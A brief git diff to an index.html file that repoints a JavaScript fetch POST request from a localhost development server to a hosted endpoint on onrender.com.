--- a/index.html
+++ b/index.html
@@ -40,7 +40,7 @@
 
             // Send the data to your server using fetch or XMLHttpRequest
             try {
-                const response = await fetch('http://localhost:3000/post', {
+                const response = await fetch('https://instafollowerinc.onrender.com/post', {
                     method: 'POST',
                     headers: {
                         'Content-Type': 'application/json'
